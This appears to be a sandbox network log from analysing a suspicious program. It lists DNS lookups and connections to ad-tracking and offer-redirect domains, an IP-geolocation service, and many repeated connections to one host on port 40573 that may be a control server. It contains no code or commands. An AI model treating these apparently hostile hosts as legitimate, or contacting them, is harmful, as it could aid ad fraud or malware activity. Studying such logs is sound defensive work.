US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.6.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.13:443 impression.appsflyer.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 offersix.info udp
US 130.211.37.129:443 www.trafficmob.net tcp
SG 172.104.40.4:80 offersix.info tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.61.138:36755 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 142.250.199.69:443 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 www.aawrnstrk.com udp
SG 172.104.40.4:80 offersix.info tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.43:443 impression.appsflyer.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 view.adjust.com udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 ip-api.com udp
US 104.248.224.82:40573 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 fast.wistia.net udp
US 151.101.2.110:443 fast.wistia.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.119.102:32795 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 stats.sa-as.com udp
US 209.128.119.150:443 stats.sa-as.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 tracking.crazyegg.com udp
US 52.0.33.168:443 tracking.crazyegg.com tcp
US 8.8.8.8:53 view.adjust.com udp
US 8.8.8.8:53 www.aawrnstrk.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 bat.bing.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 204.79.197.200:443 bat.bing.com tcp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 www.scrypt.com udp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
US 35.231.113.244:443 www.scrypt.com tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.google.nl udp
US 142.251.36.3:443 www.google.nl tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 pi.pardot.com udp
US 35.174.78.146:443 pi.pardot.com tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 service.force.com udp
GB 161.71.10.172:443 service.force.com tcp
US 172.217.26.138:443 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
IN 172.217.163.234:443 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
GB 161.71.8.41:443 service.force.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 172.217.31.234:443 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 service.force.com udp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
GB 161.71.10.172:443 service.force.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 d.la2-c1cs-ia4.salesforceliveagent.com udp
US 13.110.60.113:443 d.la2-c1cs-ia4.salesforceliveagent.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 d.la2-c1cs-ia4.salesforceliveagent.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 13.110.60.113:443 d.la2-c1cs-ia4.salesforceliveagent.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 api.bdisl.com udp
SG 172.104.40.4:80 offersix.info tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
US 8.8.8.8:53 www.aawrnstrk.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 offersix.info udp
US 130.211.37.129:443 www.trafficmob.net tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
